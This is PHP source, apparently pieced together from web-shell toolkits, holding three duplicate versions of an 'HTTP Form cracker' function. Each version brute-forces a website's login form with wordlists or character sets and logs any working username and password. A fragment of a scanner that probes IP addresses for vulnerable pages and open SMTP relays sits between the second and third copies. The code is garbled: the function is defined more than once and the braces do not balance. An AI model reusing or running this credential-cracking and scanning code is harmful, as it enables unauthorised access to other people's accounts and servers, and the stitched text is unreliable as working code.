function formcrackeR()
{
global $errorbox, $footer, $et, $hcwd;
if (!empty($_REQUEST['start'])) {
if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
$log = 1;
$file = $_REQUEST['logfilE'];
} else {
$log = 0;
}
$url = $_REQUEST['target'];
$uf = $_REQUEST['userf'];
$pf = $_REQUEST['passf'];
$sf = $_REQUEST['submitf'];
$sv = $_REQUEST['submitv'];
$method = $_REQUEST['method'];
$fail = $_REQUEST['fail'];
$dic = $_REQUEST['dictionary'];
$type = $_REQUEST['combo'];
$user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
if (!file_exists($dic)) {
die("{$errorbox} Can not open dictionary.{$et}{$footer}");
}
$dictionary = fopen($dic, 'r');
echo '<font color=blue>Cracking started...<br>';
while (!feof($dictionary)) {
if ($type) {
$combo = trim(fgets($dictionary), " \n\r");
$user = substr($combo, 0, strpos($combo, ':'));
$pass = substr($combo, strpos($combo, ':') + 1);
} else {
$pass = trim(fgets($dictionary), " \n\r");
}
$url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}";
$res = check_urL($url, $method, $fail, 12);
if (!$res) {
echo "<font color=blue>U: {$user} P: {$pass}</font><br>";
if ($log) {
file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
}
if (!$type) {
break;
}
}
}
fclose($dictionary);
echo 'Done!</font><br>';
} else {
echo "<center><table border=0 style='border-collapse: collapse' width='434'><tr><td width='174' bgcolor='#333333'>HTTP Form cracker:</td><td bgcolor='#333333' width='253'></td></tr><form method='POST' name=form><tr><td width='174' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width='253'><input type=text name=dictionary size=35></td></tr><tr><td width='174' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='174' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user>{$hcwd}</td></tr><tr><td width='174' bgcolor='#808080'>Action Page:</td><td bgcolor='#808080' width='253'><input type=text name=target value='http://" . getenv('HTTP_HOST') . "/login.php' size=35></td></tr><tr><td width='174' bgcolor='#666666'>Method:</td><td bgcolor='#666666' width='253'><select size='1' name='method'><option selected value='POST'>POST</option><option value='GET'>GET</option></select></td></tr><tr><td width='174' bgcolor='#808080'>Username field name:</td><td bgcolor='#808080' width='253'><input type=text name=userf value=user size=35></td></tr><tr><td width='174' bgcolor='#666666'>Password field name:</td><td bgcolor='#666666' width='253'><input type=text name=passf value=passwd size=35></td></tr><tr><td width='174' bgcolor='#808080'>Submit name:</td><td bgcolor='#808080' width='253'><input type=text value=login name=submitf size=35></td></tr><tr><td width='174' bgcolor='#666666'>Submit value:</td><td bgcolor='#666666' width='253'><input type=text value='Login' name=submitv size=35></td></tr><tr><td width='174' bgcolor='#808080'>Fail string:</td><td bgcolor='#808080' width='253'><input type=text name=fail value='Try again' size=35></td></tr><tr><td width='174' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> <input class=buttons type=submit name=start value=Start></form>{$et}</center>";
}
}
function formcrackeR()
{
global $hcwd;
if (!empty($_REQUEST['start'])) {
if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
$log = 1;
$file = $_REQUEST['logfilE'];
} else {
$log = 0;
}
$uf = $_REQUEST['userf'];
$pf = $_REQUEST['passf'];
$sf = $_REQUEST['submitf'];
$sv = $_REQUEST['submitv'];
$method = $_REQUEST['method'];
$fail = $_REQUEST['fail'];
if (!empty($_REQUEST['dictionary'])) {
$dic = $_REQUEST['dictionary'];
}
$type = $_REQUEST['combo'];
$user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
if ($_REQUEST['mode'] == 'wl') {
$dictionary = fopen($dic, 'r');
if ($dictionary) {
echo '<font color=#FA0>Cracking...<br>';
while (!feof($dictionary)) {
$url = $_REQUEST['target'];
if ($type) {
$combo = trim(fgets($dictionary), " \n\r");
$user = substr($combo, 0, strpos($combo, ':'));
$pass = substr($combo, strpos($combo, ':') + 1);
} else {
$pass = trim(fgets($dictionary), " \n\r");
}
$url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}";
$res = check_urL($url, $method, $fail, 12);
if (!$res) {
echo "<font color=#FA0>U: {$user} P: {$pass}</font><br>";
if ($log) {
file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
}
if (!$type) {
break;
}
}
}
fclose($dictionary);
} else {
echo "Can not open dictionary.";
}
} else {
$code = '$test=!check_urL("' . $_REQUEST['target'] . '?' . $uf . '=' . $user . '&' . $pf . '=$word&' . $sf . '=' . $sv . '","' . $method . '","' . $fail . '",12);';
@flush_buffers();
if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code)) {
echo "<b>{$user}:{$res}</b><br />";
if ($log) {
file_add_contentS($file, "U: {$user} P: {$res}\r\n");
}
}
}
echo 'Done!</font><br>';
} else {
echo '<form name=cracker method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">HTTP Form cracker</label>
</div>
<div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield">
<select name="mode" id="mode" onChange="toggle()">
<option value="09">Bruteforce [0-9]</option>
<option value="az">Bruteforce [a-z]</option>
<option value="az09">Bruteforce [a-z] [0-9]</option>
<option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option>
<option value="all">Bruteforce [ALL]</option>
<option value="wl">Wordlist</option>
</select>
</div></div>
<div class="fieldwrapper" id="dic">
<label class="styled">Dictionary:</label>
<div class="thefield">
<input type="text" name="dictionary" size="30" />
</div>
</div>
<div class="fieldwrapper" id="fcr">
<label class="styled">Dictionary type:</label>
<div class="thefield">
<ul style="margin-top:0;">
<li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li>
<li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li>
</ul>
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" value="admin" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Action:</label>
<div class="thefield">
<input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/login.php" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Method:</label>
<div class="thefield">
<select name="method"><option selected value="POST">POST</option><option value="GET">GET</option></select>
</div>
</div><div class="fieldwrapper">
<label class="styled">Username field:</label>
<div class="thefield">
<input type="text" name="userf" value="username" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password field:</label>
<div class="thefield">
<input type="text" name="passf" value="passwd" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Submit name:</label>
<div class="thefield">
<input type="text" name="submitf" value="submit" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Submit value:</label>
<div class="thefield">
<input type="text" name="submitv" value="Login" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Fail string:</label>
<div class="thefield">
<input type="text" name="fail" value="Try again" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label>
<div class="thefield">
<input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log">
</div>
</div>
' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="start" value="Start" style="margin-left: 150px;" />
</div>
</form><script type="text/JavaScript">
toggle();
</script>';
}
}
flusheR();
}
} elseif (strstr($page, '@NUKE')) {
foreach ($nuke as $cg) {
$nukech = str_replace('@NUKE', $cg, $page);
$url = "http://{$ip}{$nukech}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
}
flusheR();
}
} else {
$url = "http://{$ip}{$page}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
}
flusheR();
}
}
}
}
if (!empty($_REQUEST['smtprelay'])) {
if (checkthisporT($ip, 25, $timeout)) {
$res = '';
$res = checksmtP($ip, $timeout);
if ($res == 1) {
echo "{$ip}) SMTP relay found.<br>";
function formcrackeR()
{
global $errorbox, $footer, $et, $hcwd;
if (!empty($_REQUEST['start'])) {
$url = $_REQUEST['target'];
$uf = $_REQUEST['userf'];
$pf = $_REQUEST['passf'];
$sf = $_REQUEST['submitf'];
$sv = $_REQUEST['submitv'];
$method = $_REQUEST['method'];
$fail = $_REQUEST['fail'];
$dic = $_REQUEST['dictionary'];
$type = $_REQUEST['combo'];
$user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : "";
if (!file_exists($dic)) {
die("{$errorbox} Can not open dictionary.{$et}{$footer}");
}
$dictionary = fopen($dic, 'r');
echo "<font color=blue>Cracking started...<br>";
while (!feof($dictionary)) {
if ($type) {
$combo = trim(fgets($dictionary), " \n\r");
$user = substr($combo, 0, strpos($combo, ':'));
$pass = substr($combo, strpos($combo, ':') + 1);
} else {
$pass = trim(fgets($dictionary), " \n\r");
}
$url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}";
$res = check_urL($url, $method, $fail, 12);
if (!$res) {
echo "<font color=blue>U: {$user} P: {$pass}</font><br>";
flusheR();
if (!$type) {
break;
}
}
flusheR();
}
fclose($dictionary);
echo "Done!</font><br>";
} else {
echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>{$hcwd}</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://" . getenv('HTTP_HOST') . "/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
}
}
